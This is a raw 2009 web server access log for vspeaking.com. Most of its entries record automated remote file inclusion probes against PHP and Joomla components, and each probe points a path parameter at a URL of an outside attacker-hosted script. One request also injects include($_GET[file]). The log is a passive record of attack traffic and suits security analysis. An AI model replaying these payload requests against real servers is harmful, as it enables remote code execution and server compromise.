218.234.21.178 - - [28/Jun/2009:20:01:01 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:01:01 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:01:02 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:02:01 -0700] "GET /logs/access_090413.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [28/Jun/2009:20:02:10 -0700] "GET /logs/access_090413.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
60.43.229.5 - - [28/Jun/2009:20:03:05 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:06:33 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:06:33 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:20:06:33 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
200.54.177.242 - - [28/Jun/2009:20:14:29 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.54.177.242 - - [28/Jun/2009:20:14:29 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.54.177.242 - - [28/Jun/2009:20:14:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [28/Jun/2009:20:15:15 -0700] "GET /logs/access_090105.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [28/Jun/2009:20:15:49 -0700] "GET /logs/access_090112.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:18:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:18:36 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:18:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.54.177.242 - - [28/Jun/2009:20:18:56 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:19:31 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:19:31 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:19:31 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.254.216.47 - - [28/Jun/2009:20:19:33 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.254.216.47 - - [28/Jun/2009:20:19:33 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.254.216.47 - - [28/Jun/2009:20:19:33 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:19:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:19:46 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:19:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.54.126 - - [28/Jun/2009:20:20:24 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.54.126 - - [28/Jun/2009:20:20:24 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.54.126 - - [28/Jun/2009:20:20:24 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.244.235.254 - - [28/Jun/2009:20:21:09 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.244.235.254 - - [28/Jun/2009:20:21:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.244.235.254 - - [28/Jun/2009:20:21:09 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [28/Jun/2009:20:21:33 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [28/Jun/2009:20:21:33 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [28/Jun/2009:20:21:33 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
60.43.229.5 - - [28/Jun/2009:20:22:47 -0700] "GET /logs/access_090413.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
88.81.249.202 - - [28/Jun/2009:20:23:38 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.81.249.202 - - [28/Jun/2009:20:23:38 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.81.249.202 - - [28/Jun/2009:20:23:38 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:24:38 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:25:04 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:25:07 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:27:15 -0700] "GET /phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:27:15 -0700] "GET /logs/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:20:27:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [28/Jun/2009:20:28:11 -0700] "GET /logs/access_090413.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
67.19.130.218 - - [28/Jun/2009:20:29:58 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.177.9.20 - - [28/Jun/2009:20:34:33 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.177.9.20 - - [28/Jun/2009:20:34:33 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.177.9.20 - - [28/Jun/2009:20:34:33 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.34.162.200 - - [28/Jun/2009:20:43:35 -0700] "GET /logs/access_090413.log/errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
64.34.162.200 - - [28/Jun/2009:20:43:35 -0700] "GET /errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
64.34.162.200 - - [28/Jun/2009:20:43:35 -0700] "GET /logs/errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:20:47:24 -0700] "GET //vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:20:47:24 -0700] "GET /logs///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.17.99.13 - - [28/Jun/2009:20:47:24 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
140.239.58.70 - - [28/Jun/2009:20:47:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
140.239.58.70 - - [28/Jun/2009:20:47:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
140.239.58.70 - - [28/Jun/2009:20:47:48 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.87.37.130 - - [28/Jun/2009:20:50:42 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.87.37.130 - - [28/Jun/2009:20:50:42 -0700] "GET /phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.87.37.130 - - [28/Jun/2009:20:50:42 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
140.239.58.70 - - [28/Jun/2009:20:53:14 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.87.37.130 - - [28/Jun/2009:20:55:14 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [28/Jun/2009:20:59:38 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [28/Jun/2009:20:59:38 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [28/Jun/2009:20:59:38 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [28/Jun/2009:21:15:54 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [28/Jun/2009:21:15:54 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [28/Jun/2009:21:15:54 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [28/Jun/2009:21:16:43 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [28/Jun/2009:21:16:43 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [28/Jun/2009:21:16:48 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.209.4 - - [28/Jun/2009:21:17:06 -0700] "GET /logs/?D=A HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:51 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:51 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:51 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:53 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:53 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:53 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:56 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:57 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:18:57 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:15 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:15 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:15 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:36 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:37 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:37 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:40 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:40 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:40 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:41 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:41 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:19:41 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:19:48 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:19:48 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 2376 "-" "libwww-perl/5.825" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:19:48 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.825" "www.vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:21:15 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:21:15 -0700] "GET /logs/access.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
70.86.9.234 - - [28/Jun/2009:21:21:15 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:21:48 -0700] "GET /logs/access.log%20/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:21:22:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:21:22:05 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:21:22:05 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:22:27 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:22:33 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:21:22:39 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [28/Jun/2009:21:22:43 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
